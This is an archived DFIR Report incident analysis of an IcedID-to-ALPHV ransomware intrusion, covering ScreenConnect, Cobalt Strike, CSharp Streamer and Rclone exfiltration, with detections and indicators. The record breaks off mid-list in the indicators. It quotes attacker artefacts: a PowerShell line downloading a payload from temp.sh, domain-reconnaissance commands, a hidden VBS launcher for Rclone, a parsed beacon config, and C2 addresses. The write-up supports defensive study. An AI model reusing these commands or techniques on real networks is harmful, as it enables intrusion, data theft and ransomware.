{ "id": "b02502ec-e9f7-466d-a1fd-8f0774a4110c", "created_at": "2026-04-06T00:08:40.637442Z", "updated_at": "2026-04-10T03:33:38.103765Z", "deleted_at": null, "sha1_hash": "d2f3594bc3abe99b58c93498d4a80b3a84308728", "title": "IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4955950, "plain_text": "IcedID Brings ScreenConnect and CSharp Streamer to ALPHV\r\nRansomware Deployment - The DFIR Report\r\nBy editor\r\nPublished: 2024-06-10 · Archived: 2026-04-05 15:26:02 UTC\r\nKey Takeaways\r\nIn October 2023, we observed an intrusion that began with a spam campaign, distributing a forked IcedID loader.\r\nThe threat actor used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to\r\nexecute various commands and deploy Cobalt Strike beacons.\r\nTheir toolkit also included CSharp Streamer, a RAT written in CSharp with numerous functionalities, as documented\r\nhere.\r\nThe attacker used a custom tool to stage, and exfiltrate data, using Rclone.\r\nEight days after initial access, ALPHV ransomware was deployed across all domain joined Windows systems.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nThe DFIR Report Services\r\n→ Click here to access the DFIR Lab related to this report ←\r\nFive new sigma rules were created from this report and added to our Private sigma Rules\r\nOur Threat Feed was tracking the Cobalt Strike server in this case days before this case.\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nTable of Contents:\r\nCase Summary\r\nThe DFIR Report Services\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 1 of 30\n\nThis intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing\r\na Visual Basic Script (VBS) and a benign README file. We assess with high confidence that this email was part of a spam\r\ncampaign delivering a forked variant of IcedID. First reported by ProofPoint in February 2023, this forked IcedID variant\r\nlacks banking functionality and prioritizes payload delivery. Upon user interaction with the archive’s contents, the VBS file\r\nwas executed, initiating the embedded forked IcedID loader.\r\nThis was followed by the creation of a scheduled task to maintain persistence on the beachhead. The forked IcedID loader\r\nthen communicated with a command and control server, leading to the dropping and execution of another IcedID DLL.\r\nApproximately two minutes after execution, the first round of discovery was observed using Windows native binaries,\r\nmirroring the activity seen in previously reported IcedID cases.\r\nAround two hours into the intrusion, the threat actor installed ScreenConnect on the beachhead using a renamed installer\r\nbinary, “toovey.exe.” They executed multiple commands on the host via ScreenConnect. These commands included\r\nWindows utilities such as nltest and net for reconnaissance. They also used PowerShell cradles, bitsadmin, and certutil to\r\nattempt retrieval of Cobalt Strike beacons on the beachhead. They had a few stumbles while trying to download the Cobalt\r\nStrike beacons using temp.sh, resulting in downloading the HTML of the website rather than their intended payload file.\r\nOnce the Cobalt Strike beacons were executed, they established communication with the Cobalt Strike command and\r\ncontrol server. Within 20 minutes of this activity, a new payload, cslite.exe (CSharp Streamer C2), was dropped on the\r\nbeachhead. CSharp Streamer is a multi-function remote access trojan that was first reported in 2021. During this intrusion, it\r\nwas first used to access the LSASS process on the beachhead for credential access; and around 40 minutes after that, the\r\nthreat actor performed a dcsync operation from the beachhead host to one of the domain controllers. The threat actor then\r\ncopied a renamed ScreenConnect installer from the beachhead to a domain controller over SMB. The installation was\r\ncompleted using Impacket’s wmiexec script to remotely run the ScreenConnect installer.\r\nAfter installing ScreenConnect, we observed a log in to the domain controller using ScreenConnect to access the host.\r\nDuring this session, the threat actor dropped several CSharp Streamer payloads. Although they executed the files, we did not\r\nobserve any network traffic to a command and control server at that time. Activity then ceased for approximately eight\r\nhours.\r\nOn the second day, the threat actor returned and performed network discovery on the domain controller using SoftPerfect’s\r\nnetwork scanner. They then initiated an RDP connection from the domain controller to a backup server. The threat actor\r\nreviewed backups and running processes before dropping both a CSharp Streamer binary and a previously used\r\nScreenConnect installer. These were then executed over the RDP session. Next, a Cobalt Strike beacon was run, and LSASS\r\nwas accessed on the host.\r\nAround eleven hours later, the threat actor dropped several Cobalt Strike beacons and attempted to execute them; however,\r\nno new command and control traffic was observed. The threat actor quickly removed the files. Four hours later, another\r\nScreenConnect installer was dropped on the backup server and executed using wmiexec. A new RDP connection was then\r\ninitiated to a second domain controller, and netscan was run again. Following this, ScreenConnect was installed on the\r\nsecond domain controller, and an RDP session was started from this domain controller to a file server. On the file server,\r\nboth a Cobalt Strike beacon and the ScreenConnect installer were dropped and executed via the RDP session.\r\nAfter three days of no significant activity, the threat actor returned. They dropped and executed a new ScreenConnect\r\ninstaller on the backup server via wmiexec and ran netscan again. Using RDP, they connected to the file server and used\r\nMozilla Firefox to preview a few financial documents before running netscan there as well.\r\nThe following day, a custom tool named “confucius_cpp” was dropped on the file server. Its functionalities included\r\naggregation, staging, and compression of sensitive files. We observed the threat actor performing Google searches for the\r\nkeyword “rclone” and subsequently downloading the rclone application on the file server. Instead of direct execution, the\r\nRclone binary was started using a VBS script. Upon execution of this script, the previously staged data was successfully\r\nexfiltrated using Rclone to a remote server.\r\nOn day seven of the intrusion, a RDP connection was initiated from the beachhead to the backup and the file server using\r\nCSharp Streamer. New ScreenConnect installers appear yet again and followed the same WMI execution pattern as before.\r\nOn the final day of the intrusion, the threat actor proceeded to push toward their final objectives. From the backup server,\r\nthey ran a fresh netscan sweep and began staging both a ScreenConnect installer and an ALPHV ransomware binary. First,\r\nthey used xcopy to stage the ScreenConnect installer across all Windows hosts in the domain and then executed it using a\r\nWMI command. This was then repeated for the ALPHV ransomware payload. During the execution, we observed the threat\r\nactor deleting all the backups interactively. Upon completion of the ransomware execution, a ransom note was left behind on\r\nthe hosts. The time to ransomware (TTR) was around 180 hours, over the course of 8 days.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @yatinwad, and UC2.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 2 of 30\n\nInitial Access\r\nInitial access began with a malicious e-mail. The malicious spam campaign can be linked to a publicly reported campaign\r\nfrom @JAMESWT_MHT encouraging victims to download and open a ZIP archive.\r\nOnce the ZIP file was extracted the user was presented with a Readme and a Visual Basic Script (VBS) file.\r\nWScript.exe was called when executing the script, which starts the infection.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 3 of 30\n\nThe script embeds a DLL in a slightly obfuscated form and base64 encodes it, saves it in C:\\Windows\\Temp\\0370-1.dll and\r\nthen executes said DLL through regsvr32.\r\nThis DLL is an IcedID loader as observed with sandboxing here. The infection chain was concluded by the loader dropping\r\nand executing another IcedID DLL via rundll32.\r\nExecution\r\nScreenConnect\r\nOnce IcedID was operational, the threat actor used it to install the RMM tool ScreenConnect, renamed as toovey.exe.\r\nThroughout the intrusion the threat actor dropped several more renamed ScreenConnect installers, usually employed after\r\nmoving laterally to a new host and then executing it through Impacket’s wmiexec.py script:\r\nBesides execution with wmiexec.py, some installers were executed during the threat actor RDP sessions:\r\nScreenConnect was then used to execute various commands. This can be observed in logs, as ScreenConnect drops the\r\ndesired script on disk, followed by the corresponding interpreter, as discussed in a previous report. This can be seen in\r\nvarious events, such as Security Event ID 4688 or Sysmon Event 1, as displayed below.\r\nCobalt Strike\r\nAs in most intrusions we document, Cobalt Strike beacons were used in this intrusion. On the beachhead host, using\r\nScreenConnect, the threat actor tried to download malicious Cobalt Strike beacons using bitsadmin, without success.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 4 of 30\n\nBesides process creation event logs, bitsadmin downloads can also be detected via event ID 59 and 60 of “Microsoft-Windows-Bits-Client/Operational” log.\r\nFollowing this failure, they used another LOLBin named certutil to download their payloads, again via ScreenConnect. This\r\nbehavior was repeated to download other Cobalt Strike beacons.\r\nPowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using\r\nScreenConnect.\r\nIn addition to the previously mentioned methods of retrieving additional payloads, there was another instance where the\r\nattackers used temp.sh to host their malware. However, a failure occurs when attempting to directly download a file from\r\nthese links. Instead of obtaining the actual file, users end up downloading an HTML presentation page that prompts them to\r\nclick a link to retrieve the file.\r\npowershell Invoke-WebRequest \"http://temp.sh/VSlAV/http64.exe\" -OutFile C:\\programdata\\rr.exe\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 5 of 30\n\nOn another occasion, PowerShell usage was successful, and in those cases using Sysmon’s events we can trace child\r\nprocesses from PowerShell ParentCommandLine. For instance, the following display shows a payload used to launch\r\nhttps64.dll, another Cobalt Strike beacon.\r\nBecause the beacon was using plain HTTP, the retrieved PowerShell payload can be extracted from the network\r\ncommunications.\r\nAs documented in Cobalt Strike, a Defender’s Guide part 1 and part 2, the attackers used Cobalt Strike’s default pipe names,\r\nwhich can be easily detected.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 6 of 30\n\nImpacket\r\nAs part of their toolkit, the threat actor used Impacket’s wmiexec.py script to perform actions. This activity can be easily\r\nobserved in logs because of the default redirect of its output to \\\\127.0.0.1\\ADMIN$\\__%timestamp% (as visible in\r\nthe source code).\r\nCSharp Streamer\r\nDuring the intrusion, the threat actor deployed a binary named “cslite.exe” on the beachhead host. Upon investigation, we\r\nidentified this binary as a RAT known as CSharp Streamer, thanks to an excellent write-up by Hendrik Eckardt. This\r\nmalware combines many different functions and is a very capable remote access trojan. During this intrusion, we observed it\r\ndumping credentials, proxying RDP traffic, and providing command and control communications for the threat actor.\r\nWe were able to confirm the tool using memory analysis, and identifying known functions and commands in the previously\r\nlinked report.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 7 of 30\n\nWhen executed, the tool writes a .NET executable to the %USERPROFILE%\\AppData\\Local\\Temp folder using a .tmp\r\nextension and then loads it into memory, as seen in the Sysmon Event ID 7 event:\r\nUsing dynamic analysis from running the sample in a malware analysis sandbox, we can observe the injected .NET\r\nassemblies:\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 8 of 30\n\nPersistence\r\n IcedID\r\nIcedID registered a scheduled task for persistence, in the same manner as documented in several other reports.\r\nThe task was registered to be executed every hour after logon as indicated respectively by the following XML tags:\r\n\u003cInterval\u003ePT1H\u003c/Interval\u003e\r\n\u003cLogonTrigger id=\"LogonTrigger\"\u003e\u003cEnabled\u003etrue\u003c/Enabled\u003e\u003c/LogonTrigger\u003e\r\nScreenConnect\r\nUpon installation, ScreenConnect persists across reboots with an auto-start service. This can be seen using the built-in\r\nSystem event logs (event ID 7045).\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 9 of 30\n\nShould the System event logs be unavailable (for instance if cleared by an threat actor), the service configuration is saved\r\ninside the SYSTEM registry file, which can be analyzed using Eric Zimmerman’s Registry Explorer tool, in\r\nthe HKLM\\CurrentControlSet\\Services\\ location.\r\nAnomali Threat Research explained the parameters in their article :\r\ne as session type, can be Support, Meeting, Access.\r\ny as process type, can be Guest or Host.\r\nh as the URI to the relay service’s URI.\r\np as the relay service’s port.\r\ns as a globally unique identifier for client identification.\r\nk as the encoded encryption key, used for identity verification.\r\nt as the optional session name.\r\nDefense Evasion\r\nUpon moving laterally to a backup server, we observed Cobalt Strike injection into legitimate process “winlogon.exe” and\r\n“rundll32.exe”.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 10 of 30\n\nBy relying on memory captures, defenders may also have other detection methods. Here, by processing the acquired\r\nmemory with MemprocFS and using the findevil command, we can find an injected beacon in winlogon.exe.\r\nDuring the intrusion, the threat actor deleted the renamed ScreenConnect installers from the backup server and the file\r\nserver using the “del” command, in an attempt to cover their tracks.\r\nCredential Access\r\nCredentials were extracted from LSASS (Local Security Authority Subsystem), a technique commonly seen during similar\r\nintrusions. On day one, through hands-on activity, the threat actor executed cslite.exe (a CSharp Streamer file dropped on\r\nthe Desktop of a compromised user), which was used to access the LSASS process. Process access can be seen using\r\nSysmon event ID 10, as displayed below.\r\nMicrosoft documented the granted accesses, which are the following:\r\n0x1010: PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010)\r\n0x1FFFFF: PROCESS_ALL_ACCESS\r\nAnother data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve\r\nthe address of code from where the OpenProcessfunction was called, potential indication of a DLL in memory.\r\nWe also were able to collect memory and scan it with various YARA rules, confirming the use of a Mimikatz\r\nimplementation with several rule hits for the cslite.exe memory space and file:\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 11 of 30\n\nIn another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should\r\nhappen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll,\r\ndbghelp.dll or dbgcore.dll (source 1, source 2) should be monitored.\r\nFinally, on the second day, we can see yet another access to LSASS, this time from rundll32.exe, once again using\r\naccess 0x1010 and with UNKNOWN in the CallTrace. This time, rundll32.exe was spawned by PowerShell, which was\r\ntasked to download and execute a Cobalt Strike beacon.\r\nAround 40 minutes after the LSASS dump by the “cslite.exe” executable, we observed a traffic spike from the beachhead\r\nhost to a domain controller. Reviewing this network traffic using the Suricata rules from Didier Stevens, we discovered\r\npotential Mimikatz dcsync activity between the hosts.\r\nAt the same time we found Event ID 4662 logs on the domain controller, confirming a sync operation requested by the\r\n“Administrator” account:\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 12 of 30\n\nSpecifically, we were looking for the Domain-DNS Class(object) — Schema GUID: 19195a5b-6da0–11d0-afd3–\r\n00c04fd930c9 and DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2 as\r\nexplained in this SpectreOps post, to detect this dcsync activity. Using these two points of evidence, we can say with good\r\nconfidence that the threat actor performed a dcsync operation.\r\nDiscovery\r\nMinutes after the initial compromise, a first round of discovery was observed using native Windows built-in utilities,\r\nspawning from the IcedID malware.\r\ncmd.exe /c chcp \u003e\u00262\r\nipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nLater on, the threat actor used ScreenConnect to run other discovery commands, on several occasions\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nnet group \"Domain Computers\" /domain\r\nnet group \"domain admins\" /domain\r\nnet group \"enterprise admins\" /domain\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nquser\r\nipconfig /all\r\nnet group \"domain computers\" /domain\r\nsysteminfo\r\nroute print\r\nnltest /dclist:\r\nOn day two, day five, and day eight, the threat actor performed rounds of network discovery using SoftPerfect netscan.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 13 of 30\n\nEach time, the scan goes over the same IP address space, and scans for the ports 135 (RPC), 445 (SMB) and 3389 (RDP),\r\nwith a few extras related to the Veeam backup solutions.\r\nLateral Movement\r\nThe renamed ScreenConnect installer was copied from the beachhead to domain controllers, a backup server, and a file\r\nserver using SMB. As explained in the execution section, the installer was also executed via Impacket’s wmiexec.py script,\r\nwhich resulted in the ScreenConnect installation. Multiple commands were executed on the compromised hosts via\r\nScreenConnect command functionality.\r\nEvent ID 5145 logs:\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 14 of 30\n\nRDP was used extensively during the intrusion by the threat actor to move laterally.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 15 of 30\n\nWhile the threat actor most frequently used the native Windows RDP clients, on at least one occasion they proxied their\r\nRDP session via the CSharp Streamer.\r\nWhen doing this, they left a trace of their remote host name logged under Event ID 4778:\r\n77724F2\r\nCollection\r\nBefore initiating the exfiltration process, a custom tool called confucius_cpp.exe was dropped on a file server. This tool was\r\nused to aggregate, stage, and compress sensitive data files, using LDAP and creating multiple ZIP archives.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 16 of 30\n\nAs seen when executing the tool in a lab environment, the LDAP query with search filter (\u0026(objectClass=computer)) is first\r\nmade to look for computers, as documented in Microsoft learn website.\r\nOnce the LDAP query is complete, the tool enumerates shared folders, filtering out some uninteresting folders such as\r\nNETLOGON or SYSVOL.\r\nOn each selected folder, the tool will look for files based on keywords (in the screenshot they’re after the\r\nwords security_reports and finance) before compressing data. This automates the collection phase, ensuring swift action\r\nacross the whole network.\r\nThe attacker also installed Firefox to preview a few documents. This can be seen by looking at the process command line,\r\nwhich contains the url argument, as displayed below.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 17 of 30\n\nCommand and Control\r\nThe threat actor leveraged the following methods to access the hosts within the network:\r\nIcedID\r\nCobalt Strike\r\nCSharp Streamer\r\nScreenConnect\r\nIcedID\r\nThe forked IcedID loader established connection to command and control server modalefastnow[.]com over port 443, which\r\nresolved at the time to 212.18.104.12. The contents of the network connection matched a malware rule in the Emerging\r\nThreats Open ruleset “ET MALWARE Win32/IcedID Request Cookie”.\r\nAfter the initial infection, the second stage IcedID DLL communicated with the following C2 servers:\r\nIP Port Domain JA3 JA3s\r\n173.255.204.62 443 jkbarmossen[.]com a0e9f5d64349fb13191bc781f81f42e1 N/A\r\n94.232.46.27 443 evinakortu[.]com\r\na0e9f5d64349fb13191bc781f81f42e1,\r\n1138de370e523e824bbca92d049a3777\r\nN/A\r\n94.232.46.27 443 hofsaalos[.]com\r\na0e9f5d64349fb13191bc781f81f42e1\r\n1138de370e523e824bbca92d049a3777\r\nN/A\r\n77.105.140.181 443 jerryposter[.]com a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\n77.105.142.135 443 skrechelres[.]com a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc\r\n212.18.104.12 443 modalefastnow[.]com a0e9f5d64349fb13191bc781f81f42e1 N/A\r\nja4: t12d190800_d83cc789557e_7af1ed941c26\r\nja4: t10d070700_c50f5591e341_c39ab67fec8e\r\nja4s: t120400_c030_12a20535f9be\r\nja4x: 96a6439c8f5c_96a6439c8f5c_795797892f9c\r\nCobalt Strike\r\nThe threat actor dropped Cobalt Strike beacons across hosts during the intrusion, communicating with the following IP\r\naddresses.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 18 of 30\n\nIP Port Domain JA3 JA3s AS Organization ASN\r\nGeolocation\r\nCountry\r\n85.209.11.48 80 N/A N/A N/A\r\nChang Way\r\nTechnologies Co.\r\nLimited\r\n57523 Russia\r\nThe DFIR Threat intelligence feeds tracked this infrastructure as a live Cobalt Strike server starting 2023-09-29 through\r\n2023-10-30.\r\nThe following URIs were accessed for 85.209.11.48:\r\nUsing MemProcFS to process the memory from the backup server, we were able to extract the minidump for the injected\r\nCobalt Strike process. Using the minidump, the beacon configuration was able to be parsed using 1768.py:\r\nFile: minidump.dmp\r\nConfig found: xorkey b'.' 0x00000000 0x00010000\r\n0x0001 payload type 0x0001 0x0002 0 windows-beacon_http-reverse_http\r\n0x0002 port 0x0001 0x0002 80\r\n0x0003 sleeptime 0x0002 0x0004 60000\r\n0x0004 maxgetsize 0x0002 0x0004 1048576\r\n0x0005 jitter 0x0001 0x0002 0\r\n0x0007 publickey 0x0003 0x0100 30819f300d06092a864886f70d010101050003818d00308189028181\r\n0x0008 server,get-uri 0x0003 0x0100 '85.209.11.48,/load'\r\n0x0043 DNS_STRATEGY 0x0001 0x0002 0\r\n0x0044 DNS_STRATEGY_ROTATE_SECONDS 0x0002 0x0004 -1\r\n0x0045 DNS_STRATEGY_FAIL_X 0x0002 0x0004 -1\r\n0x0046 DNS_STRATEGY_FAIL_SECONDS 0x0002 0x0004 -1\r\n0x000e SpawnTo 0x0003 0x0010 (NULL ...)\r\n0x001d spawnto_x86 0x0003 0x0040 '%windir%\\\\syswow64\\\\rundll32.exe'\r\n0x001e spawnto_x64 0x0003 0x0040 '%windir%\\\\sysnative\\\\rundll32.exe'\r\n0x001f CryptoScheme 0x0001 0x0002 0\r\n0x001a get-verb 0x0003 0x0010 'GET'\r\n0x001b post-verb 0x0003 0x0010 'POST'\r\n0x001c HttpPostChunk 0x0002 0x0004 0\r\n0x0025 license-id 0x0002 0x0004 1580103824 Stats uniques -\u003e ips/hostnames: 210 publickey\r\n0x0026 bStageCleanup 0x0001 0x0002 0\r\n0x0027 bCFGCaution 0x0001 0x0002 0\r\n0x0009 useragent 0x0003 0x0100 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trid\r\n0x000a post-uri 0x0003 0x0040 '/submit.php'\r\n0x000b Malleable_C2_Instructions 0x0003 0x0100\r\n Transform Input: [7:Input,4]\r\n Print\r\n0x000c http_get_header 0x0003 0x0200\r\n Build Metadata: [7:Metadata,3,6:Cookie]\r\n BASE64\r\n Header Cookie\r\n0x000d http_post_header 0x0003 0x0200\r\n Const_header Content-Type: application/octet-stream\r\n Build SessionId: [7:SessionId,5:id]\r\n Parameter id\r\n Build Output: [7:Output,4]\r\n Print\r\n0x0036 HostHeader 0x0003 0x0080 (NULL ...)\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 19 of 30\n\n0x0032 UsesCookies 0x0001 0x0002 1\r\n0x0023 proxy_type 0x0001 0x0002 2 IE settings\r\n0x003a TCP_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0039 SMB_FRAME_HEADER 0x0003 0x0080 '\\x00\\x04'\r\n0x0037 EXIT_FUNK 0x0001 0x0002 1\r\n0x0028 killdate 0x0002 0x0004 0\r\n0x0029 textSectionEnd 0x0002 0x0004 0\r\n0x002b process-inject-start-rwx 0x0001 0x0002 64 PAGE_EXECUTE_READWRITE\r\n0x002c process-inject-use-rwx 0x0001 0x0002 64 PAGE_EXECUTE_READWRITE\r\n0x002d process-inject-min_alloc 0x0002 0x0004 0\r\n0x002e process-inject-transform-x86 0x0003 0x0100 (NULL ...)\r\n0x002f process-inject-transform-x64 0x0003 0x0100 (NULL ...)\r\n0x0035 process-inject-stub 0x0003 0x0010 '\"+\\x8f\\'Ûߺ\\x8dÝU\\x9eì¢~¦H'\r\n0x0033 process-inject-execute 0x0003 0x0080 '\\x01\\x02\\x03\\x04'\r\n0x0034 process-inject-allocation-method 0x0001 0x0002 0\r\n0x0000\r\nGuessing Cobalt Strike version: 4.3 (max 0x0046)\r\nSanity check Cobalt Strike config: OK\r\nSleep mask 64-bit 4.2 deobfuscation routine found: 0x005e2f3f\r\nSleep mask 64-bit 4.2 deobfuscation routine found: 0x00624b3f\r\nCSharp Streamer\r\nThe “cslite.exe” CSharp Streamer executable communicated to the IP address 109.236.80.191. During the intrusion, we\r\nobserved traffic to it across various ports, including 135, 139, 80, 443, and 3389. Most traffic was observed at 443 and 3389.\r\nLooking at the memory of the “cslite.exe” run in a sandbox, we can extract the configured communication preferences for\r\nthe trojan:\r\nThe malware uses WebSockets for communication, as observed with the wss:// in the URL. We also see that the\r\ncommunication was setup to use socket.io, to proxy the communication. And if the malware cannot reach a specific port, it\r\nrotates through a list of various ports, likely to both evade ports blocked in the victim firewall and help obfuscate\r\ncommunication by changing the port in use throughout an intrusion.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 20 of 30\n\nIP Port Domain Ja3 Ja3s\r\nAS\r\nOrganizatio\r\n109.236.80.191 443 www.i2rtqyj[.]ekz c12f54a3f91dc7bafd92cb59fe009a35 394441ab65754e2207b1e1b457b3641d\r\nWorldStrea\r\nB.V.\r\nja4: t12i210600_76e208dd3e22_2dae41c691ec\r\nja4s: t120200_c02f_ec53b3cc8a64\r\nja4s: t120400_c02f_12a20535f9be\r\nja4x: bbd6cc0fca29_4ce939b68fae_79faaa53868b\r\nDuring the intrusion, we observed several Zeek notice messages alerting on the self-signed certificate used by the CSharp\r\nStreamer command and control server.\r\nScreenConnect\r\nPost the initial forked IcedID loader infection, the threat actor deployed ScreenConnect on the beachhead using a renamed\r\nbinary “toovey.exe”. Later, ScreenConnect was installed on multiple systems by dropping renamed installer and executing it\r\nthrough Impacket’s wmiexec.py script.\r\nExfiltration\r\nWhile Firefox was used to preview documents, it was also used to download Rclone. When the process command line is not\r\navailable, defenders can look for web history artifacts. In Firefox, web history artifacts are well documented and can be\r\ndirectly looked at using an SQLite browser.\r\nRclone was dropped on the file server. This can be detected by looking at file creation, for instance using the event ID 11\r\nfrom Sysmon.\r\nRclone was not directly started, but was launched though a VBS script named nocmd.vbs, which itself executes rcl.bat,\r\nwhich in turn executes Rclone.\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run chr(34) \u0026 \"c:\\programdata\\rcl.bat\" \u0026 Chr(34), 0\r\nSet WshShell = Nothing\r\nBefore that, the threat actor used the config Rclone command, which performs the following action according to the\r\ndocumentation:\r\nenter an interactive configuration session where you can setup new remotes and manage existing ones\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 21 of 30\n\nUpon execution, network artifacts show an increase in egress traffic to the exfiltration server on port 22 (SSH). Increase of\r\negress traffic, especially to previously unknown hosts or suspicious ports can be used to detect early exfiltration attempts.\r\nIndeed, below is presented a chart of traffic to port 22 during the whole course of this intrusion.\r\nExfiltration Server data:\r\nIP Port Domain AS Organization ASN Geolocation Country\r\n217.23.12.8 22 N/A WorldStream B.V. 49981 Netherlands\r\nImpact\r\nOn the eighth day of the intrusion, the threat actor moved toward their final objective, deploying ALPHV Ransomware. This\r\nstarted with the threat actor staging two files on the backup server.\r\n“setup.exe,” which was dropped twice, was just the latest ScreenConnect installer the adversary employed during the\r\nintrusion. “BNUfUOmFT2.exe” was the ransomware binary.\r\nFirst, they used the xcopy Windows utility to move the ScreenConnect installer across the domain in the root of C$:\r\nSecond, they remotely ran the installer on hosts using WMI commands:\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 22 of 30\n\nThird, they repeated the process, copying the ransomware payload from the backup server to the domain joined hosts in the\r\nnetwork.\r\nFinally, they used this same method to execute the ransomware remotely via WMI:\r\nOn the remote hosts, the “WMIPrvSE.exe” was observed executing the task.\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 23 of 30\n\nDuring the ransomware deployment phase, we observed the threat actor deleting all the backups interactively.\r\nAfter completing the encryption of files, the following note was left on the infected hosts with the call out to review Twitter\r\nto associate the group:\r\nTimeline\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 24 of 30\n\nDiamond Model\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 25 of 30\n\nIndicators\r\nAtomic\r\nCobaltStrike\r\n85.209.11[.]48\r\nCSharp Streamer\r\n109.236.80[.]191\r\nData exfiltration\r\n217.23.12[.]8\r\nForked IcedID Loader\r\n212.18.104[.]12 / modalefastnow[.]com\r\n2nd Stage IcedID payload\r\n92.118.112[.]113 /hofsaalos[.]com\r\n173.255.204[.]62 / jkbarmossen[.]com\r\n94.232.46[.]27 / evinakortu[.]com\r\n77.105.140[.]181 / jerryposter[.]com\r\n77.105.142[.]135 / 